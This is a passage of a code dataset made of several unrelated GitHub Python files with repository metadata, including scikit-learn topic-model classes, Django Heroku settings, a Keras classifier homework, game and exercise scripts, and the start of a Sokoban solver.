topic table\n def get_topic_corr_matrix(self):\n dtmc = self.doc_topic_matrix.cov()\n dtmc = dtmc[dtmc > 0].fillna(0)\n dtmc = np.square(dtmc)\n return dtmc\n\n\nfrom sklearn.decomposition import NMF\n\n@dataclass \nclass NMFTopicModel(AbstractTopicModel):\n\n nmf_max_iter:int = 1000\n nmf_alpha:float = .1\n nmf_l1_ratio:float = .5\n nmf_beta_loss:str = 'frobenius' #'kullback-leibler'\n nmf_solver:str = 'cd'\n nmf_random_state:int = 1\n nmf_init:str = 'nndsvd'\n\n def generate_model(self):\n\n print(\"Initializing NMF Engine.\")\n self.engine = NMF(\n n_components = self.n_topics, \n init = self.nmf_init,\n solver = self.nmf_solver, \n beta_loss = self.nmf_beta_loss, \n max_iter = self.nmf_max_iter, \n random_state = self.nmf_random_state, \n alpha = self.nmf_alpha,\n l1_ratio = self.nmf_l1_ratio)\n\n print(\"Generating NMF Model.\")\n self.model = self.engine.fit_transform(self.corpus.tfidf_model)\n\n print(\"Extracting NMF Doc-Topic Matrix.\")\n self.doc_topic_matrix = pd.DataFrame(self.model)\n self.doc_topic_matrix.index.name = 'doc_id'\n self.doc_topic_matrix.columns.name = 'topic_id'\n\n print(\"Extracting NMF Term-Topic Matrix.\")\n self.term_topic_matrix = pd.DataFrame(self.engine.components_, \n columns=self.corpus.termlist).T\n self.term_topic_matrix.index.name = 'term_str' \n self.term_topic_matrix.columns.name = 'topic_id' \n\n print(\"Extracting NMF Topics.\")\n self.topic = self.doc_topic_matrix.sum().to_frame('preponderance')\n self.topic.index.name = 'topic_id'\n self.topic['label'] = self.topic.apply(lambda x: \\\n self._create_topic_label(x.name, self.term_topic_matrix), 1)\n \n return self\n\n\nfrom 
sklearn.decomposition import LatentDirichletAllocation\n\n@dataclass \nclass LDATopicModel(AbstractTopicModel):\n\n lda_max_iter:int = 10\n lda_learning_method:str = 'online'\n lda_learning_offset:float = 50.\n lda_random_state:int = 0\n\n def generate_model(self):\n\n print(\"Initializing LDA Engine.\")\n self.engine = LatentDirichletAllocation(\n n_components = self.n_topics, \n max_iter = self.lda_max_iter,\n learning_method = self.lda_learning_method,\n learning_offset = self.lda_learning_offset, \n random_state = self.lda_random_state)\n \n print(\"Generating LDA Model.\")\n self.model = self.engine.fit_transform(self.corpus.count_model)\n\n print(\"Extracting LDA Doc-Topic Matrix.\")\n self.doc_topic_matrix = pd.DataFrame(self.model)\n self.doc_topic_matrix.index.name = 'doc_id'\n self.doc_topic_matrix.columns.name = 'topic_id'\n\n print(\"Extracting LDA Term-Topic Matrix.\")\n self.term_topic_matrix = pd.DataFrame(self.engine.components_, \n columns=self.corpus.termlist).T\n self.term_topic_matrix.index.name = 'term_str'\n self.term_topic_matrix.columns.name = 'topic_id'\n\n print(\"Extracting LDA Topics.\")\n self.topic = self.doc_topic_matrix.sum().to_frame('preponderance')\n self.topic.index.name = 'topic_id'\n self.topic['label'] = self.topic.apply(lambda x: \\\n self._create_topic_label(x.name, self.term_topic_matrix), 1)\n\n return self\n\nfrom sklearn.decomposition import PCA\n\n@dataclass\nclass PCATopicModel(AbstractTopicModel):\n \n pca_n_components:int = 10\n \n def generate_model(self):\n\n print(\"Initializing PCA Engine.\")\n self.engine = PCA(n_components=self.pca_n_components)\n \n print(\"Generating PCA Model.\")\n self.model = self.engine.fit_transform(self.corpus.tfidf_model.toarray())\n\n print(\"Extracting PCA Doc-Topic Matrix.\")\n self.doc_topic_matrix = pd.DataFrame(self.model)\n self.doc_topic_matrix.index.name = 'doc_id'\n\n print(\"Extracting PCA Term-Topic Matrix (i.e. Loadings).\")\n self.term_topic_matrix = pd.DataFrame(self.engine.components_.T * \\\n np.sqrt(self.engine.explained_variance_))\n self.term_topic_matrix.index = self.corpus.termlist\n self.term_topic_matrix.index.name = 'term_id' \n \n print(\"Extract PCA Topics (i.e. Components).\")\n self.topic = pd.DataFrame(self.engine.explained_variance_, columns=\"preponderance\")\n self.topic.index.name = 'topic_id'\n \n self.topic['label'] = self.topic\\\n .apply(lambda x: self._create_topic_label(x.name, \n self.term_topic_matrix), 1)\n\n self.topic['label_neg'] = self.topic\\\n .apply(lambda x: self._create_topic_label(x.name, \n self.term_topic_matrix, ascending=True), 1)\n\n return self\n\nfrom sklearn.decomposition import TruncatedSVD as SVD\n\n@dataclass\nclass SVDTopicModel(AbstractTopicModel):\n \n n_components:int = 10\n n_iter:int = 7\n random_state:int = 42\n \n def generate_model(self):\n\n print(\"Initializing SVD Engine.\")\n self.engine = SVD(n_components=self.n_components, \n n_iter=self.n_iter, \n random_state=self.random_state)\n \n print(\"Generating SVD Model.\")\n self.model = self.engine.fit_transform(self.corpus.tfidf_model.toarray())\n\n print(\"Extracting SVD Doc-Topic Matrix.\")\n self.doc_topic_matrix = pd.DataFrame(self.model)\n self.doc_topic_matrix.index.name = 'doc_id'\n\n print(\"Extracting SVD Term-Topic Matrix (i.e. 
Loadings).\")\n self.term_topic_matrix = pd.DataFrame(self.engine.components_.T * \\\n np.sqrt(self.engine.explained_variance_))\n self.term_topic_matrix.index = self.corpus.termlist\n self.term_topic_matrix.index.name = 'term_id' \n \n print(\"Extract SVD Topics (i.e. Components).\")\n self.topic = pd.DataFrame(self.engine.explained_variance_, columns='preponderance')\n self.topic.index.name = 'topic_id'\n \n self.topic['label'] = self.topic\\\n .apply(lambda x: self._create_topic_label(x.name, \n self.term_topic_matrix), 1)\n\n self.topic['label_neg'] = self.topic\\\n .apply(lambda x: self._create_topic_label(x.name, \n self.term_topic_matrix, ascending=True), 1)\n\n return self\n","repo_name":"ontoligent/TAPI_Topic_Models","sub_path":"lib/etal.py","file_name":"etal.py","file_ext":"py","file_size_in_byte":12334,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"33294052778","text":"# -*- coding: utf-8 -*-\n# settings/heroku.py\nfrom .base import * # noqa\n\n# Parse database configuration from $DATABASE_URL\nimport dj_database_url\nDATABASES = {\n 'default': dj_database_url.config()\n}\n\n# Honor the 'X-Forwarded-Proto' header for request.is_secure()\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\n# debug\n# heroku config:add DJANGO_DEBUG=true\n# heroku config:remove DJANGO_DEBUG\nDEBUG = bool(os.environ.get('DJANGO_DEBUG', ''))\n","repo_name":"captnswing/freechess","sub_path":"freechess/settings/heroku.py","file_name":"heroku.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"1234651480","text":"import numpy as np\nimport pandas as pd\nfrom pandas import DataFrame\nfrom sklearn import preprocessing\nfrom keras import optimizers\nimport matplotlib.pyplot as plt\nfrom keras.utils import np_utils\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Dropout,Flatten,Conv2D,MaxPooling2D\nimport csv\n\n\n\nTrain_fpath='data/train.csv'\nExam_fpath='data/test.csv'\nOutputFileName = \"ex.csv\"\nthreshold=0.5\nBatchsize =500\nEpochs =1\nlr =0.0001\nFeatureCount = 13\n\ndef ExamDataPreprocessing (ExamData):\n ExamData['workclass']=ExamData['workclass'].replace(' ?',' Private')\n ExamData['workclass'].fillna('Private')\n ExamData['workclass'].replace(np.nan, 'Private', inplace=True)\n ExamData['workclass'].replace(np.inf, 'Private', inplace=True)\n ExamData['marital_status'].fillna(0)\n ExamData['marital_status'].replace(np.nan, '0', inplace=True)\n ExamData['marital_status'].replace(np.inf, '0', inplace=True)\n \n colnums =pd.Series(['workclass','education','marital_status','occupation','relationship','race','sex','native_country'])\n ExamData =DataAllDecode(ExamData,colnums)\n\n\n #ExamData.drop(['fnlwgt'],axis =1)\n \n\n ndarray =ExamData.values\n\n Features=ndarray[:,0:FeatureCount]\n \n minmax_scale = preprocessing.MinMaxScaler(feature_range=(0, 1))\n scaledFeatures=minmax_scale.fit_transform(Features)\n print(scaledFeatures)\n return scaledFeatures\n\n\ndef ReadFile (TrainPath,TestPath):\n Train =pd.read_csv (TrainPath)\n Test =pd.read_csv (TestPath)\n return Train,Test\n\ndef DataDecode (Data):\n Items =Data.drop_duplicates()\n index = 0\n for item in Items:\n Data.replace(item, index, inplace=True)\n index=index+1\n Data=Data.astype(int)\n return Data\n\ndef DataAllDecode (Data,colums):\n for index in colums:\n Data[index]=DataDecode(Data[index])\n return Data\ndef 
TrainDataPreprocessing(Data):\n\n Data['workclass']=Data['workclass'].replace(' ?',' Private')\n Data['workclass'].fillna('Private')\n Data['workclass'].replace(np.nan, 'Private', inplace=True)\n Data['workclass'].replace(np.inf, 'Private', inplace=True)\n Data['marital_status'].fillna(0)\n Data['marital_status'].replace(np.nan, '0', inplace=True)\n Data['marital_status'].replace(np.inf, '0', inplace=True)\n colnums =pd.Series(['workclass','education','marital_status','occupation','relationship','race','sex','native_country','income'])\n Data =DataAllDecode(Data,colnums)\n \n \n #Data.to_csv(\"CleanData.csv\")\n #Data.drop(['fnlwgt'],axis =1)\n x_OneHot_df = pd.get_dummies(data=Data,columns=[\"income\"])\n \n\n ndarray =x_OneHot_df.values\n Label =ndarray[:,14] \n Features=ndarray[:,0:FeatureCount]\n \n minmax_scale = preprocessing.MinMaxScaler(feature_range=(0, 1))\n scaledFeatures=minmax_scale.fit_transform(Features)\n print(scaledFeatures)\n return scaledFeatures,Label\n\n \ndef show_train_history(train_history,train,validation):\n plt.plot(train_history.history[train])\n plt.plot(train_history.history[validation])\n plt.title(\"Train History\")\n plt.ylabel(train)\n plt.xlabel('Epoch')\n plt.legend(['train','validation'],loc='upper left')\n plt.show()\n\ndef WriteOutputFile (AllProbability):\n \n with open(OutputFileName, 'w', newline='') as csvfile:\n \n writer = csv.writer(csvfile)\n \n \n writer.writerow(['id', 'label'])\n for i in range (0,len(AllProbability)):\n code= 1\n if(AllProbability[i] >threshold):\n code=0\n writer.writerow([i+1, code])\n print(\"Output file\",OutputFileName)\n \nif __name__=='__main__':\n \n \n TrainData ,ExamData =ReadFile(Train_fpath,Exam_fpath)\n \n ExamDataFeatures =ExamDataPreprocessing(ExamData)\n msk =np.random.rand(len(TrainData))<0.8\n train_data = TrainData[msk]\n test_data = TrainData[~msk]\n TrainFeatrue,TrainLabel = TrainDataPreprocessing(train_data)\n TestFeature,TestLabel =TrainDataPreprocessing(test_data)\n print(ExamDataFeatures[:2])\n model=Sequential()\n model.add(Dense(units =30,input_dim=FeatureCount,kernel_initializer='uniform',activation ='relu'))\n model.add(Dense(units =20,kernel_initializer='uniform',activation ='relu'))\n model.add(Dense(units =15,kernel_initializer='uniform',activation ='relu'))\n model.add(Dense(units =1,kernel_initializer='uniform',activation ='sigmoid'))\n sgd = optimizers.SGD(lr=lr, decay=1e-6, momentum=0.9, nesterov=True)\n adam=optimizers.Adam (lr=lr, beta_1=0.9, beta_2=0.999, epsilon=None, decay=1e-6, amsgrad=False)\n model.compile (loss='binary_crossentropy',\n optimizer=adam,metrics =['accuracy'])\n\n \n train_history =model.fit (x=TrainFeatrue,y=TrainLabel,\n validation_split=0.2,epochs=Epochs,\n batch_size =Batchsize,verbose =2)\n\n show_train_history(train_history,'acc','val_acc')\n show_train_history(train_history,'loss','val_loss')\n scores =model.evaluate (x =TestFeature,y =TestLabel)\n print(scores[1])\n\n all_probability=model.predict (ExamDataFeatures)\n \n print(all_probability,len(all_probability))\n \n WriteOutputFile(all_probability)\n \n\n\n \n \n","repo_name":"mick60316/AI_Class_HW02","sub_path":"HW2.py","file_name":"HW2.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71557308899","text":"import logging\n\n\ndef indices(string, char):\n \"\"\"\n Return the indices of the given character in the given string.\n Return an empty list if the character cannot be found.\n \"\"\"\n return 
[i for i, c in enumerate(string) if c == char]\n\n\ndef substitute(command_list, dictionary, drop=False, drop_line=True):\n \"\"\"\n Replace markup in the command_list which matches a key in the dictionary with the\n value of that key in the dictionary. Empty values leave the item unchanged.\n Markup needs to be safe to use in the final command as there is no guarantee that\n any dictionary will replace all markup in the command_list.\n arguments: command_list - a list of strings\n dictionary - a dictionary of keys which match some of the strings with values\n to replace for the key in the string.\n drop - drop the value if a key is present but the value is None/empty\n drop_line - drop the entire command if a key is present but the value is None/empty\n \"\"\"\n parsed = []\n for line in command_list:\n for key, value in dictionary.items():\n if value:\n line = line.replace(key, value)\n elif drop and key in line:\n # If drop_line is activated or Value=None, remove the entire line\n if drop_line or value is None:\n line = None\n break\n # Otherwise, replace just the key by nothing\n else:\n line = line.replace(key, value)\n if line is not None:\n parsed.append(line)\n return parsed\n\n\ndef seconds_to_str(time):\n hours, remainder = divmod(int(round(time)), 3600)\n minutes, seconds = divmod(remainder, 60)\n return \"%02d:%02d:%02d\" % (hours, minutes, seconds)\n\n\ndef safe_dict_format(string, dictionary):\n \"\"\"\n Used to replace value in string using dictionary\n eg : '{foo}{bar}.safe_dict_format({'foo' : 'hello'})\n >>> 'hello{bar}'\n \"\"\"\n\n class SafeDict(dict):\n def __missing__(self, key):\n logger = logging.getLogger(\"lava-dispatcher\")\n logger.warning(\"Missing key : '{%s}' for string '%s'\", key, string)\n return \"{\" + key + \"}\"\n\n return string.format_map(SafeDict(dictionary))\n\n\ndef map_kernel_uboot(kernel_type, device_params=None):\n \"\"\"\n Support conversion of kernels only if the device cannot\n handle what has been given by the test job writer.\n\n Decide based on the presence of suitable load addresses.\n If deploy gets a kernel type for which there is no matching boot kernel address\n then if a bootm address exists do the conversion.\n bootm is the last resort.\n \"\"\"\n bootcommand = \"bootm\"\n logger = logging.getLogger(\"lava-dispatcher\")\n if kernel_type == \"uimage\":\n return bootcommand\n elif kernel_type == \"zimage\":\n if device_params and \"bootz\" in device_params:\n bootcommand = \"bootz\"\n else:\n logger.warning(\n \"No bootz parameters available, falling back to bootm and converting zImage\"\n )\n elif kernel_type == \"image\":\n if device_params and \"booti\" in device_params:\n bootcommand = \"booti\"\n else:\n logger.warning(\n \"No booti parameters available, falling back to bootm and converting zImage\"\n )\n return bootcommand\n","repo_name":"Linaro/lava","sub_path":"lava_dispatcher/utils/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"34"} +{"seq_id":"37961886044","text":"import math\nfrom random import *\nfrom external_info import *\n\nclass Player:\n def __init__(self):\n self.firstname = fn[randint(0, len(fn)-1)]\n self.lastname = ln[randint(0, len(ln)-1)]\n self.style = styles[randint(0,5)]\n determine_starting_stats(self, self.style)\n self.potential = curved_potential()\n self.pow += math.floor(random()/10*6*self.potential)\n self.int += math.floor(random()/10*6*self.potential)\n self.sze += 
math.floor(random()/10*6*self.potential)\n self.spd += math.floor(random()/10*6*self.potential)\n self.acc += math.floor(random()/10*6*self.potential)\n self.exp += math.floor(random()/10*6*self.potential)\n self.blc += math.floor(random()/10*6*self.potential)\n self.end += math.floor(random()/10*6*self.potential)\n self.trait = determine_trait(self.style, self.potential)\n if self.trait[0] == \"Giant\":\n self.sze += 10\n if self.sze > 99:\n self.sze = 99\n self.GS = (self.pow + self.acc + self.exp)/3\n self.PM = (self.int + self.acc + self.blc)/3\n self.SW = (self.spd + self.exp + self.end)/3\n self.DF = (self.sze + self.blc + self.end)/3\n self.overall = round((self.GS + self.PM + self.SW + self.DF)/4)\n self.GS = round(self.GS)\n self.PM = round(self.PM)\n self.SW = round(self.SW)\n self.DF = round(self.DF)\n \n self.growth_style = \"Development\"\n self.age = 20\n self.injury = round(randint(6, 9)+random(), 1)\n self.team = None\n self.contract = [None, None]\n\n def age_player(self):\n self.age += 1\n if self.age == 30:\n #retire\n print(\"Retire\")\n \n if self.growth_style == \"Development\":\n nums = []\n for i in range(7):\n nums.append(math.ceil(random()*(self.potential)/2))\n if self.trait[0] == \"Prodigy\":\n nums[i] += 1\n if self.trait[0] == \"Stunted\":\n a = randint(1,3)\n if a == 3:\n nums[i] -= 1\n if self.age >= 24:\n rand = randint(1, 100)\n if self.age == 24 and rand >= 86 or self.age == 25 and rand >=41 or self.age == 26:\n self.growth_style = \"Prime\"\n self.injury -= randint(1, 20)/10\n elif self.growth_style == \"Prime\":\n nums = []\n for i in range(7):\n num = randint(1, 11)-self.potential\n if num <= 0:\n nums.append(math.ceil(random()*(self.potential)/3))\n else:\n nums.append(-1*math.ceil(random()*(3-(self.potential/4))))\n if self.age >= 26:\n rand = randint(1, 100)\n if self.age == 26 and rand >= 86 or self.age == 27 and rand >=41 or self.age == 28:\n self.growth_style = \"Veteran\"\n self.injury -= randint(-15, 15)/10\n else:\n #VETERAN\n nums = []\n for i in range(7):\n nums.append(-1*math.ceil(random()*(6-(self.potential/2))))\n if self.trait[0] == \"Dedicated\" and nums[i] < 0:\n nums[i] += 1\n if self.trait[0] == \"Short-Lived\":\n nums[i] -= 2\n self.injury -= randint(-20, -1)/10\n\n if self.trait[0]==\"Superstar\":\n for i in range(len(nums)):\n if nums[i] < 1:\n nums[i] += 2\n else:\n nums[i] += 1\n\n if self.trait[0]==\"Consistent\":\n for i in range(len(nums)):\n if nums[i] < -2:\n nums[i] += 1\n elif nums[i] > 3:\n nums[i] -= 1\n\n if self.trait[0]==\"Wildcard\":\n for i in range(len(nums)):\n nums[i] += randint(-2, 2)\n \n\n if self.style == \"Attacker\":\n self.pow += (nums[0]+randint(0, 3))\n self.int += (nums[1]+randint(0, 3))\n self.spd += (nums[2]+randint(-1, 1))\n self.acc += (nums[3]+randint(0, 4))\n self.exp += (nums[4]+randint(-1, 2))\n self.blc += (nums[5]+randint(-1, 2))\n self.end += (nums[6]+randint(-2, 1))\n elif self.style == \"Finisher\":\n self.pow += (nums[0]+randint(0, 3))\n self.int += (nums[1]+randint(-1, 1))\n self.spd += (nums[2]+randint(0, 3))\n self.acc += (nums[3]+randint(-1, 2))\n self.exp += (nums[4]+randint(0, 4))\n self.blc += (nums[5]+randint(-2, 1))\n self.end += (nums[6]+randint(-1, 2))\n elif self.style == \"Two-Way\":\n self.pow += (nums[0]+randint(0, 3))\n self.int += (nums[1]+randint(-1, 1))\n self.spd += (nums[2]+randint(-1, 1))\n self.acc += (nums[3]+randint(-1, 2))\n self.exp += (nums[4]+randint(-1, 2))\n self.blc += (nums[5]+randint(-1, 3))\n self.end += (nums[6]+randint(-1, 3))\n elif self.style == 
\"Playmaker\":\n self.pow += (nums[0]+randint(-1, 1))\n self.int += (nums[1]+randint(0, 3))\n self.spd += (nums[2]+randint(0, 3))\n self.acc += (nums[3]+randint(-1, 2))\n self.exp += (nums[4]+randint(-1, 2))\n self.blc += (nums[5]+randint(-1, 2))\n self.end += (nums[6]+randint(-1, 2))\n elif self.style == \"Distributor\":\n self.pow += (nums[0]+randint(-1, 1))\n self.int += (nums[1]+randint(0, 3))\n self.spd += (nums[2]+randint(-1, 1))\n self.acc += (nums[3]+randint(-1, 2))\n self.exp += (nums[4]+randint(-2, 1))\n self.blc += (nums[5]+randint(0, 5))\n self.end += (nums[6]+randint(-1, 3))\n else:\n self.pow += (nums[0]+randint(-1, 1))\n self.int += (nums[1]+randint(-1, 1))\n self.spd += (nums[2]+randint(0, 3))\n self.acc += (nums[3]+randint(-2, 1))\n self.exp += (nums[4]+randint(-1, 2))\n self.blc += (nums[5]+randint(-1, 3))\n self.end += (nums[6]+randint(0, 5))\n\n if self.trait[0] == \"Scared\":\n self.blc -= 1\n self.end -= 1\n if self.trait[0] == \"Speedster\":\n self.spd += 3\n self.exp += 1\n self.blc -= 1\n if self.trait[0] == \"Sniper\":\n self.pow += 1\n self.acc += 1\n self.exp += 1\n if self.trait[0] == \"Dead Weight\":\n self.spd -= 1\n self.exp -= 1\n self.end -= 1\n if self.trait[0] == \"Hardened\":\n self.end += 1\n self.int += 1\n self.injury -= 0.5\n if self.trait[0] == \"Genius\":\n self.int += 2\n self.acc += 1\n self.blc += 1\n if self.trait[0] == \"Pass-First\":\n self.int += 2\n self.blc += 1\n self.pow -= 1\n if self.trait[0] == \"Whimp\":\n self.pow -= 1\n self.acc -= 1\n self.exp -= 1\n if self.trait[0] == \"Giant\":\n self.blc += 1\n self.end += 1\n if self.trait[0] == \"Agile\":\n self.injury += 0.5\n self.spd += 1\n self.exp += 1\n if self.trait[0] == \"Fish-Like\":\n self.spd += 1\n self.exp += 1\n self.end += 1\n if self.trait[0] == \"Selfish\":\n self.pow += 2\n self.exp += 1\n self.int -= 1\n if self.trait[0] == \"Dumb\":\n self.int -= 1\n self.acc -= 1\n self.blc -= 1\n if self.trait[0] == \"Brick Wall\":\n self.blc += 2\n self.end += 1\n self.spd -= 1\n if self.trait[0] == \"Hard Worker\":\n self.acc += 1\n self.blc += 1\n\n if self.pow > 99:\n self.pow = 99\n if self.int > 99:\n self.int = 99\n if self.spd > 99:\n self.spd = 99\n if self.acc > 99:\n self.acc = 99\n if self.exp > 99:\n self.exp = 99\n if self.blc > 99:\n self.blc = 99\n if self.end > 99:\n self.end = 99\n \n self.GS = (self.pow + self.acc + self.exp)/3\n self.PM = (self.int + self.acc + self.blc)/3\n self.SW = (self.spd + self.exp + self.end)/3\n self.DF = (self.sze + self.blc + self.end)/3\n self.overall = round((self.GS + self.PM + self.SW + self.DF)/4)\n self.GS = round(self.GS)\n self.PM = round(self.PM)\n self.SW = round(self.SW)\n self.DF = round(self.DF)\n self.injury = round(self.injury, 1)\n if self.injury <= 0.1:\n self.injury == 0.1\n\n def __str__(self):\n #return \"{0} {1}, Age: {2}, Style: {3}, Trait: {4}, {5} Star Potential, {6}, \\nStats(GS {7}, PM {8}, SW {9}, DF {10}, {11}) Injury: {12}\".format(self.firstname, self.lastname, self.age, self.style, self.trait[0], self.potential, self.team, self.GS, self.PM, self.SW, self.DF, self.overall, self.injury)\n return \"Age: {0}, GS {1}; PM {2}; SW {3}; DF {4}; Overall {5}; Potential {6}; STYLE - {7}; TRAIT - {8} ; \".format(self.age, self.GS, self.PM, self.SW, self.DF, self.overall, self.potential, self.style, 
self.trait[0])","repo_name":"ItsMeToast/ProjectPoolball","sub_path":"src/scripts/player_class.py","file_name":"player_class.py","file_ext":"py","file_size_in_byte":9376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5210654407","text":"'''\n\n'''\n\nimport sys\n\ndef ship_class(c):\n if c == 'B' or c == 'b':\n return 'BattleShip'\n elif c == 'C' or c == 'c':\n return 'Cruiser'\n elif c == 'D' or c == 'd':\n return 'Destroyer'\n elif c == 'F' or c == 'f':\n return 'Frigate'\n else:\n return 'Error'\n\nt = int(input())\nfor i in range(t):\n c = input()\n print(ship_class(c))","repo_name":"Harish-Muralidhar/Benchmark_Test_To_Analyze_Performance_Of_Code_Generating_Foundation_Models","sub_path":"generated_codes/experiment_c/parameter_set_2/single_sample/python_files/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30888431514","text":"import sys\nimport pygame\nimport math\nfrom pygame.locals import *\n\ndef main():\n (x,y) = (500,500) \n deg = 0 \n pygame.init() \n pygame.display.set_mode((x, y), 0, 32) \n screen = pygame.display.get_surface()\n\n while (1):\n pygame.draw.rect(screen, (0, 200, 0), (0,0,int(x/2),int(y/2)))\n pygame.draw.line(screen, (0, 200, 0), (0, y/2), (x, int(y/2)))\n pygame.draw.line(screen, (0, 200, 0), (int(x/2), 0), (int(x/2), y))\n for i in range(1, 30):\n dx = x/2 + x/2 * math.cos(math.radians(deg-i))\n dy = y/2 + x/2 * math.sin(math.radians(deg-i))\n pygame.draw.aaline(screen, (0, 255/i, 0), (int(x/2), int(y/2)), (int(dx), int(dy)),5)\n\n pygame.display.update() \n pygame.time.wait(30) \n screen.fill((0, 20, 0, 0)) \n\n for event in pygame.event.get():\n if event.type == QUIT: \n pygame.quit() \n sys.exit()\nif __name__ == \"__main__\":\n main()","repo_name":"biorobaw/robotito","sub_path":"V3/Code/robotito/drawMap.py","file_name":"drawMap.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70275796257","text":"#Aim : Program to multiply two entered integer values.\n#Developer: Rakesh yadav\n\n\nx = float (input(\"Enter 1st number: \"))\ny = float (input(\"Enter 2nd number: \"))\n\n# logic for multiplying two numbers\nz = x * y\nprint(\"Multiply of %.2f and %.2f is : %.2f\" %(x , y , z))\n\n\n","repo_name":"gfobiyatechnical/2k19-With-Python-","sub_path":"Getting started With Python 3._/Lab/que5.py","file_name":"que5.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"42974084992","text":"# -*- coding: utf-8 -*-\n# UTF-8 encoding when using korean\nuser_input = 'adfkdncjdk'\nanswer = 0\nif len(user_input) >= 10:\n answer += 1\n\nbanbok = [False, False, False, False] # 소문자, 대문자, 숫자, 특수문자\n\nasc_list = []\nfor i in user_input:\n asc_list.append(ord(i))\nprint(asc_list)\n\nfor j in asc_list:\n if banbok[3] == False:\n if 33 <= j <= 47 or 58 <= j <= 64 or 91 <= j <= 96 or 123 <= j <= 125: # 특수문자\n banbok[3] = True\n\n if banbok[0] == False:\n if 97 <= j <= 122:\n banbok[0] = True\n if banbok[1] == False:\n if 65 <= j <= 90:\n banbok[1] = True\n if banbok[2] == False:\n if 48 <= j <= 57:\n banbok[2] = True\n\nanswer = answer + banbok.count(True)\nprint(banbok)\nprint('LEVEL' + 
str(answer))","repo_name":"AhnDogeon/algorithm_study","sub_path":"line/엔터프라이즈1.py","file_name":"엔터프라이즈1.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"41430885704","text":"import itertools\nfrom typing import TextIO, List, Tuple\n\nimport networkx as nx\nfrom PIL import Image\n\nfrom Base import Base, AbstractFilenameProvider\nfrom common.python import images\nfrom common.python.tuples import add_tuple\n\n\ndef load_map(fd: TextIO) -> List[List[str]]:\n return [list(l.strip()) for l in fd if l]\n\n\ndef fac_frac(n, k=None):\n if k is None:\n k = n\n m = 1\n for i in range(n - k + 1, n + 1):\n m *= i\n return m\n\n\ndef get_cell(loc, plane, idx_to_cell, guy_location, crate_locations):\n y, x = loc\n if plane[y][x] == '#':\n return '#'\n if (y, x) == guy_location:\n return 's'\n if (y, x) in (idx_to_cell[i] for i in crate_locations):\n return 'c'\n return ' '\n\n\ndef set_remove_add(tup: Tuple, rem, add):\n assert rem in tup\n x = set(tup)\n x.remove(rem)\n x.add(add)\n return tuple(sorted(x))\n\n\ndef generate_graph(plane: List[List[str]]):\n idx_to_cell = []\n cell_to_idx = {}\n crates = sum(cell == 'c' for row in plane for cell in row)\n for y in range(len(plane)):\n for x in range(len(plane[y])):\n if plane[y][x] != '#':\n cell_to_idx[(y, x)] = len(idx_to_cell)\n idx_to_cell.append((y, x))\n\n g = nx.DiGraph()\n for guy_location in range(len(idx_to_cell)):\n for crate_locations in itertools.combinations(set(range(len(idx_to_cell))).difference({guy_location}), crates):\n node = (guy_location, tuple(crate_locations))\n g.add_node(node)\n for move in [(1, 0), (-1, 0), (0, 1), (0, -1)]:\n new_guy = move[0] + idx_to_cell[guy_location][0], move[1] + idx_to_cell[guy_location][1]\n next_over = get_cell(new_guy, plane, idx_to_cell, guy_location, crate_locations)\n if next_over == ' ':\n g.add_edge(node, (cell_to_idx[new_guy], tuple(crate_locations)))\n if next_over == 'c':\n next_crate = move[0] + new_guy[0], move[1] + new_guy[1]\n two_over = get_cell(next_crate, plane, idx_to_cell, guy_location, crate_locations)\n if two_over == ' ':\n crate_idx = cell_to_idx[new_guy]\n new_crate_idx = cell_to_idx[next_crate]\n new_node = cell_to_idx[new_guy], set_remove_add(crate_locations, crate_idx, new_crate_idx)\n assert new_node[0] not in new_node[1]\n g.add_edge(node, new_node)\n\n return g, idx_to_cell, cell_to_idx\n\n\ndef get_start_state(plane, cell_to_idx):\n guy_loc = None\n crate_locs = []\n\n for y in range(len(plane)):\n for x in range(len(plane[y])):\n if plane[y][x] == 's':\n guy_loc = cell_to_idx[(y, x)]\n if plane[y][x] == 'c':\n crate_locs.append(cell_to_idx[(y, x)])\n return guy_loc, tuple(crate_locs)\n\n\ndef get_end_states(plane, cell_to_idx):\n crate_locs = []\n for y in range(len(plane)):\n for x in range(len(plane[y])):\n if plane[y][x] == 'x':\n crate_locs.append(cell_to_idx[(y, x)])\n\n for guy in set(range(len(cell_to_idx))).difference(crate_locs):\n yield guy, tuple(crate_locs)\n\n\ndef coords_to_moves(coords):\n moves = []\n for a, b in zip(coords[:-1], coords[1:]):\n d = b[0] - a[0], b[1] - a[1]\n if d == (1, 0):\n moves.append('DOWN')\n elif d == (-1, 0):\n moves.append('UP')\n elif d == (0, 1):\n moves.append('RIGHT')\n elif d == (0, -1):\n moves.append('LEFT')\n else:\n raise AssertionError\n return moves\n\n\ndef solve_sokoban(fn):\n with open(fn) as fd:\n plane = load_map(fd)\n\n empty = sum(cell != '#' for row in plane for cell in row)\n crates = sum(cell == 'c' for 
